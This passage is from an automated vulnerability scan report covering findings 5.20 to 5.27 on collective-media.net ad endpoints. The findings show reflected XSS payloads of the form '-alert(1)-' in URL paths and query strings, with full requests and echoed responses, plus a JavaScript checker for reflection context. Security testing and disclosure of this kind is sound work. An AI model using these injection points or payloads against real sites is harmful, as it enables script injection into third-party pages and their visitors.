5.20. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [srb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.starpulse/srb_jbl_042911

Issue detail

The value of the srb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdfce'-alert(1)-'2f90fc1dbf8 was submitted in the srb parameter. This input was echoed unmodified in the application's response. As with the sz finding above, the captured request leaves the srb value itself unchanged (srb_jbl_news) and carries the payload appended to the query string after ord=681443252?; the server copies that trailing query string verbatim into the single-quoted src URL.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.starpulse/srb_jbl_042911;srb=srb_jbl_news;sz=728x90;ord=681443252?cdfce'-alert(1)-'2f90fc1dbf8 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Date: Wed, 11 May 2011 14:56:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 14:56:22 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.starpulse/srb_jbl_042911;srb=srb_jbl_news;sz=728x90;net=cm;ord=681443252?cdfce'-alert(1)-'2f90fc1dbf8;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.21. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abd59'-alert(1)-'5bf498b1e30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/edh.mayoclinicabd59'-alert(1)-'5bf498b1e30/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;ord=935450012? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 497
Date: Wed, 11 May 2011 15:31:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:31:31 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/edh.mayoclinicabd59'-alert(1)-'5bf498b1e30/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.22. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3132'-alert(1)-'b9b8459dcf3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/edh.mayoclinic/eyevisione3132'-alert(1)-'b9b8459dcf3/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;ord=935450012? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 497
Date: Wed, 11 May 2011 15:31:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:31:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/edh.mayoclinic/eyevisione3132'-alert(1)-'b9b8459dcf3/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.23. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26a81'-alert(1)-'553a259d848 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/edh.mayoclinic/eyevision/general26a81'-alert(1)-'553a259d848;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;ord=935450012? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 497
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:31:36 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:31:36 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general26a81'-alert(1)-'553a259d848;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.24. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [cmn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/edh.mayoclinic/eyevision/general

Issue detail

The value of the cmn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53ce5'-alert(1)-'ddc0eb33dd9 was submitted in the cmn parameter. This input was echoed unmodified in the application's response. In the captured request the cmn value itself stays wfm and the payload is appended to the query string after ord=935450012?; the server copies that trailing query string verbatim into the single-quoted src URL.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/edh.mayoclinic/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;ord=935450012?53ce5'-alert(1)-'ddc0eb33dd9 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 498
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:52 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:30:52 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012?53ce5'-alert(1)-'ddc0eb33dd9;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.25. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/edh.mayoclinic/eyevision/general

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28853'-alert(1)-'72ac924f984 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/edh.mayoclinic/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;ord=935450012?&28853'-alert(1)-'72ac924f984=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 501
Date: Wed, 11 May 2011 15:31:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:31:25 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012?&28853'-alert(1)-'72ac924f984=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.26. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.217/L3_5490311

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70ea8'-alert(1)-'562779ec2ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj70ea8'-alert(1)-'562779ec2ef/bzo.217/L3_5490311;sz=300x250;net=bzo;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989;env=ifr;ord1=584484;cmpgurl=http%253A//ad.burstdirectads.com/st%253Fad_type%253Diframe%2526ad_size%253D300x250%2526section%253D1858209%2526bur%253D2016%2526x%253Dhttp%253A//www.burstnet.com/ads/ad21832a-map.cgi/BCPG175222.253833.315920/VTS%253D2jBaC.Ncac/SZ%253D300X250A/V%253D2.3S//ST%253D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc/REDIRURL%253D? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:45 GMT
Connection: close
Content-Length: 8245

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-51112901_1305127845","http://ad.doubleclick.net/adj70ea8'-alert(1)-'562779ec2ef/bzo.217/L3_5490311;net=bzo;u=,bzo-51112901_1305127845,11f8f328940989e,Miscellaneous,bzo.slqz-bzo.e6d-bzo.T8P-bzo.h3i-bzo.d8n-bzo.c9q-dx.16-dx.23-dx.17-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak
...[SNIP]...

5.27. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.217/L3_5490311

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload defdd'-alert(1)-'33bd626a147 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.217defdd'-alert(1)-'33bd626a147/L3_5490311;sz=300x250;net=bzo;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989;env=ifr;ord1=584484;cmpgurl=http%253A//ad.burstdirectads.com/st%253Fad_type%253Diframe%2526ad_size%253D300x250%2526section%253D1858209%2526bur%253D2016%2526x%253Dhttp%253A//www.burstnet.com/ads/ad21832a-map.cgi/BCPG175222.253833.315920/VTS%253D2jBaC.Ncac/SZ%253D300X250A/V%253D2.3S//ST%253D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc/REDIRURL%253D? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:52 GMT
Connection: close
Content-Length: 8236

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-75896266_1305127852","http://ad.doubleclick.net/adj/bzo.217defdd'-alert(1)-'33bd626a147/L3_5490311;net=bzo;u=,bzo-75896266_1305127852,11f8f328940989e,Miscellaneous,bzo.slqz-bzo.e6d-bzo.T8P-bzo.h3i-bzo.d8n-bzo.c9q-dx.16-dx.23-dx.17-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1
...[SNIP]...
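The check behind the "copied into a JavaScript string which is encapsulated in single quotation marks" and "echoed unmodified" statements in findings 5.16 through 5.27, as an added JavaScript example that is neither the scanner's nor collective-media.net's code: it locates the payload in a response body, works out which JavaScript lexical context it landed in, and decides whether the payload's quote can close that context. The sample body is the captured response of finding 5.16; the escaped and double-quoted variants are constructed for comparison, and the function names are assumptions.

```javascript
// Added example (not the scanner's or collective-media.net's code). Implements the
// reflection check the findings describe: find the payload, determine the lexical
// context at that offset, and report whether the quote in the payload breaks out.
// Function names are illustrative assumptions.

// Walk the source up to `index`, tracking whether we are in code, a '/"/` string
// literal, or a comment. Regex literals and template ${} substitutions are not
// modelled; that is enough for ad-tag responses like the ones in this section,
// but it is not a general JavaScript tokenizer.
function jsContextAt(src, index) {
  let state = "code";
  for (let i = 0; i < index; i++) {
    const c = src[i], n = src[i + 1];
    if (state === "code") {
      if (c === "'" || c === '"' || c === "`") state = c;
      else if (c === "/" && n === "/") state = "line-comment";
      else if (c === "/" && n === "*") { state = "block-comment"; i++; }
    } else if (state === "line-comment") {
      if (c === "\n") state = "code";
    } else if (state === "block-comment") {
      if (c === "*" && n === "/") { state = "code"; i++; }
    } else {                       // inside a string literal delimited by `state`
      if (c === "\\") i++;         // skip the escaped character
      else if (c === state) state = "code";
    }
  }
  return state;
}

// Classify how a payload is reflected: not at all, escaped (its quotes came back
// as \'), or verbatim; and whether a verbatim reflection can close the literal it
// sits in. A reflection inside a double-quoted literal cannot be closed by '.
function checkReflection(body, payload) {
  const idx = body.indexOf(payload);
  if (idx < 0) {
    const escaped = body.includes(payload.replace(/'/g, "\\'"));
    return { reflected: escaped, escaped, context: null, breaksOut: false };
  }
  const context = jsContextAt(body, idx);
  const inLiteral = context === "'" || context === '"' || context === "`";
  return { reflected: true, escaped: false, context, breaksOut: inLiteral && payload.includes(context) };
}

// Sample input: the response body of finding 5.16 as captured above, and its payload.
const PAYLOAD_516 = "66074'-alert(1)-'7179536e508";
const BODY_516 = [
  "var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;",
  "var ifr = (self==top ? '' : 'env=ifr;');",
  "document.write('<scr'+'ipt language=\"javascript\" src=\"http://k.collective-media.net/cmadj/cm.pub_webmd/;sz=160x600;net=cm;ord=[timestamp]?66074'-alert(1)-'7179536e508;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?\">",
].join("\n");

// Constructed variants (not from the page): the same payload reflected with its
// quotes backslash-escaped, and reflected inside a double-quoted literal.
const BODY_ESCAPED = BODY_516.replace(PAYLOAD_516, PAYLOAD_516.replace(/'/g, "\\'"));
const BODY_DOUBLE = 'var tag = "x' + PAYLOAD_516 + '";';

console.log(checkReflection(BODY_516, PAYLOAD_516));
console.log(checkReflection(BODY_ESCAPED, PAYLOAD_516));
console.log(checkReflection(BODY_DOUBLE, PAYLOAD_516));
```

For the captured body the result is context "'" with breaksOut true, which is the condition the report labels Certain; the escaped variant is reported as reflected but not exploitable, and the double-quoted variant shows why the scanner pairs the quote character in its payload with the literal it expects to land in.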

